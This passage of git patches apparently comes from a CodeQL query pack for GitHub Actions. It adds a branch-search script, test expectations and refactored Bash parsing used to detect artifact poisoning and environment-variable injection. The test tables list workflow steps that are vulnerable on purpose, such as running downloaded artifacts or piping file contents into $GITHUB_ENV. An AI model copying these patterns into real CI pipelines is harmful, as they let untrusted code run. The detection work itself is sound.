snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths From 48fa2967eda4212a5082b9a460351375152b2754 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:22:40 +0200 Subject: [PATCH 578/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- search_branches.py | 88 ++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+), 2 deletions(-) create mode 100644 search_branches.py diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 91329e4f347e..229b1f81c7be 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.65 +version: 0.1.66 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1689480b56b8..e03e2a45cb72 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.65 +version: 0.1.66 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/search_branches.py b/search_branches.py new file mode 100644 index 000000000000..d0036169fea3 --- /dev/null +++ b/search_branches.py @@ -0,0 +1,88 @@ +import base64 +import os +import re +import sys +import time + +import requests + + +def handle_rate_limit(response, wait_time=60): + return False + + +def search_branches(repo_nwo, file_path, regex_pattern): + # GitHub API base URL + base_url = "https://api.github.com" + + # Get GitHub token from environment variable + github_token = os.environ.get("GITHUB_TOKEN") + if not github_token: + print("Error: GITHUB_TOKEN environment variable not set") + sys.exit(1) + + # Set up headers for authenticated requests + headers = { + "Authorization": f"token {github_token}", + "Accept": "application/vnd.github.v3+json", + } + + # Get all branches (with pagination) + branches_url = f"{base_url}/repos/{repo_nwo}/branches" + branches = [] + while branches_url: + branches_response = requests.get(branches_url, headers=headers) + if handle_rate_limit(branches_response): + continue + branches_response.raise_for_status() + branches.extend(branches_response.json()) + branches_url = branches_response.links.get("next", {}).get("url") + + # Compile the regex pattern + pattern = re.compile(regex_pattern) + + # Search file contents in each branch + for branch in branches: + branch_name = branch["name"] + file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" + + while True: + file_response = requests.get(file_url, headers=headers) + + if file_response.status_code == 200: + file_content = file_response.json()["content"] + + decoded_content = base64.b64decode(file_content).decode("utf-8") + + if pattern.search(decoded_content): + print(f"Match found in branch: {branch_name}!!!!!") + else: + print(f"No match found in branch: {branch_name}") + break + elif file_response.status_code == 404: + print(f"File not found in branch: {branch_name}") + break + elif ( + file_response.status_code == 403 + and "X-RateLimit-Remaining" in file_response.headers + ): + if int(file_response.headers["X-RateLimit-Remaining"]) == 0: + reset_time = int(file_response.headers["X-RateLimit-Reset"]) + sleep_time = reset_time - int(time.time()) + 1 + print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") + time.sleep(sleep_time) + + +if __name__ == "__main__": + if len(sys.argv) != 4: + print("Usage: python search_branches.py ") + sys.exit(1) + + repo_nwo = sys.argv[1] + file_path = sys.argv[2] + regex_pattern = sys.argv[3] + + print( + f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" + ) + search_branches(repo_nwo, file_path, regex_pattern) From c7b57b5b771b5cbda25e252bffdcfc1900f18498 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:55:41 +0200 Subject: [PATCH 579/707] Merge command and file store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 ++++++------------- .../dataflow/internal/DataFlowPrivate.qll | 2 - 2 files changed, 18 insertions(+), 44 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b0d98d2e6590..787a5f720845 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -49,8 +49,15 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "bar=${foo}" >> "$GITHUB_OUTPUT" */ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and @@ -67,8 +74,15 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and @@ -76,41 +90,3 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl succ.asExpr() = run.getEnclosingJob() ) } - -/** - * A downloaded artifact that gets assigned to a Run step output. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" - * - run: | - * foo=$(> "$GITHUB_ENV" - */ -predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(FileSource source, Run run, string key, string cmd | - source.asExpr().(Step).getAFollowingStep() = run and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and - Bash::outputsPartialFileContent(run, cmd) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since there may not be an implicit env attribute - succ.asExpr() = run.getEnclosingJob() - ) -} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d7c3dad9ee7e..cf95292588c3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -351,8 +351,6 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - fileToOutputStoreStep(node1, node2, c) or - fileToEnvStoreStep(node1, node2, c) or commandToOutputStoreStep(node1, node2, c) or commandToEnvStoreStep(node1, node2, c) } From a09acb546228a9f11a2ddedd5c5a1ce4d80ea324 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:56:09 +0200 Subject: [PATCH 580/707] Better parsing of Bash script commands --- ql/lib/codeql/actions/Bash.qll | 15 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 97 +++++++++++++++---- .../actions/security/PoisonableSteps.qll | 2 +- 3 files changed, 90 insertions(+), 24 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 5907b601a46c..fc9a75319ebf 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -8,14 +8,21 @@ module Bash { string commandSeparator() { result = ["&&", "||"] } - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + string splitSeparator() { + result = stmtSeparator() or + result = commandSeparator() } string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + string pipeSeparator() { result = "|" } + + string separator() { + result = stmtSeparator() or + result = commandSeparator() or + result = pipeSeparator() + } + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a4b5778246a5..eaf1ae871a9f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1438,39 +1438,43 @@ class RunImpl extends StepImpl { max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) } - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and // when splitting the line with a separator that is not present, the result is the original line which may contain other separators // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparators()) > -1 + not result.indexOf(Bash::splitSeparator()) > -1 } - private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { round = 0 and - old = this.cmdProducer(line) and + old = this.stmtProducer(line) and new = old or round > 0 and exists(string middle, string target, string replacement | - this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and this.rankedQuotedStringReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) } - private string restoredQuotedStringLineProducer(int i) { + private string restoredStmtQuotedStringLineProducer(int i) { result = - max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) } - private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { round = 0 and - old = this.restoredQuotedStringLineProducer(line) and + old = this.restoredStmtQuotedStringLineProducer(line) and new = old or round > 0 and exists(string middle, string target, string replacement | - this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and this.rankedCmdSubstitutionReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) @@ -1479,7 +1483,7 @@ class RunImpl extends StepImpl { string getStmt(int i) { result = max(int round, string new | - this.doRestoreCmdSubstitutions(i, round, _, new) + this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round ) @@ -1487,18 +1491,63 @@ class RunImpl extends StepImpl { string getAStmt() { result = this.getStmt(_) } - predicate getAssignment(int i, string name, string value) { - exists(string stmt | - stmt = this.getStmt(i) and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) ) } - predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } string getCommand(int i) { - result = this.getStmt(i) and + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and // exclude the following keywords not result = [ @@ -1509,6 +1558,16 @@ class RunImpl extends StepImpl { string getACommand() { result = this.getCommand(_) } + predicate getAssignment(int i, string name, string value) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + predicate getAWriteToGitHubEnv(string name, string value) { exists(string raw | Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index a0755f3582dc..5e8731010cac 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getACommand().regexpFind(regexp, _, _)) + this.getACommand().regexpMatch("^" + regexp + ".*") ) } } From be87eccbe729abbbda912d476c586b3ffc2ca88b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:04:20 +0200 Subject: [PATCH 581/707] Refactor Script support --- ql/lib/codeql/actions/Ast.qll | 48 ++- ql/lib/codeql/actions/Bash.qll | 398 +++++++++++++++--- ql/lib/codeql/actions/Helper.qll | 1 + ql/lib/codeql/actions/PowerShell.qll | 50 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 374 +++++----------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../codeql/actions/dataflow/FlowSources.qll | 20 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 6 +- .../security/ArgumentInjectionQuery.qll | 20 +- .../security/ArtifactPoisoningQuery.qll | 60 ++- .../actions/security/CodeInjectionQuery.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 4 +- .../security/EnvPathInjectionQuery.qll | 29 +- .../actions/security/EnvVarInjectionQuery.qll | 29 +- .../security/OutputClobberingQuery.qll | 117 +++-- .../actions/security/PoisonableSteps.qll | 13 +- .../security/UntrustedCheckoutQuery.qll | 16 +- .../.github/workflows/commands.yml | 20 +- ql/test/library-tests/commands.expected | 34 +- ql/test/library-tests/commands.ql | 2 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.expected | 1 + .../CWE-074/.github/workflows/output1.yml | 1 + .../actions/download-artifact-2/action.yaml | 32 ++ .../actions/download-artifact/action.yaml | 32 ++ .../.github/workflows/artifactpoisoning51.yml | 20 + .../.github/workflows/artifactpoisoning52.yml | 26 ++ .../.github/workflows/artifactpoisoning53.yml | 27 ++ .../.github/workflows/artifactpoisoning91.yml | 29 ++ .../.github/workflows/artifactpoisoning92.yml | 29 ++ .../CWE-077/EnvVarInjectionCritical.expected | 20 + .../CWE-077/EnvVarInjectionMedium.expected | 15 + .../ArtifactPoisoningCritical.expected | 12 - .../CWE-829/ArtifactPoisoningMedium.expected | 9 - 35 files changed, 1001 insertions(+), 519 deletions(-) create mode 100644 ql/lib/codeql/actions/PowerShell.qll create mode 100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cc29ceffe53b..620f74e25bb8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,6 +22,10 @@ class AstNode instanceof AstNodeImpl { CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } + + ScalarValue getInScopeDefaultValue(string name, string prop) { + result = super.getInScopeDefaultValue(name, prop) + } } class ScalarValue extends AstNode instanceof ScalarValueImpl { @@ -121,6 +125,10 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { class Input extends AstNode instanceof InputImpl { } +class Default extends AstNode instanceof DefaultsImpl { + ScalarValue getValue(string name, string prop) { result = super.getValue(name, prop) } +} + class Outputs extends AstNode instanceof OutputsImpl { Expression getAnOutputExpr() { result = super.getAnOutputExpr() } @@ -286,14 +294,18 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step instanceof RunImpl { - string getScript() { result = super.getScript() } - - ScalarValue getScriptScalar() { result = super.getScriptScalar() } + ShellScript getScript() { result = super.getScript() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getShell() { result = super.getShell() } +} + +class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { + string getRawScript() { result = super.getRawScript() } + string getStmt(int i) { result = super.getStmt(i) } string getAStmt() { result = super.getAStmt() } @@ -302,19 +314,23 @@ class Run extends Step instanceof RunImpl { string getACommand() { result = super.getACommand() } - predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + string getFileReadCommand(int i) { result = super.getFileReadCommand(i) } - predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + string getAFileReadCommand() { result = super.getAFileReadCommand() } - predicate getAWriteToGitHubEnv(string name, string value) { - super.getAWriteToGitHubEnv(name, value) + predicate getAssignment(int i, string name, string data) { super.getAssignment(i, name, data) } + + predicate getAnAssignment(string name, string data) { super.getAnAssignment(name, data) } + + predicate getAWriteToGitHubEnv(string name, string data) { + super.getAWriteToGitHubEnv(name, data) } - predicate getAWriteToGitHubOutput(string name, string value) { - super.getAWriteToGitHubOutput(name, value) + predicate getAWriteToGitHubOutput(string name, string data) { + super.getAWriteToGitHubOutput(name, data) } - predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + predicate getAWriteToGitHubPath(string data) { super.getAWriteToGitHubPath(data) } predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { super.getAnEnvReachingGitHubOutputWrite(var, output_field) @@ -331,6 +347,18 @@ class Run extends Step instanceof RunImpl { predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { super.getACmdReachingGitHubEnvWrite(cmd, output_field) } + + predicate getAnEnvReachingGitHubPathWrite(string var) { + super.getAnEnvReachingGitHubPathWrite(var) + } + + predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } + + predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } + + predicate fileToGitHubPath(string path) { super.fileToGitHubPath(path) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fc9a75319ebf..541ab437db2b 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -1,7 +1,303 @@ private import codeql.actions.Ast -private import codeql.Locations -import codeql.actions.config.Config -private import codeql.actions.security.ControlChecks + +class BashShellScript extends ShellScript { + BashShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("bash%") + ) + } + + private string lineProducer(int i) { + result = this.getRawScript().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparator()) > -1 + } + + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.stmtProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredStmtQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredStmtQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + override string getStmt(int i) { + result = + max(int round, string new | + this.doStmtRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + override string getAStmt() { result = this.getStmt(_) } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, 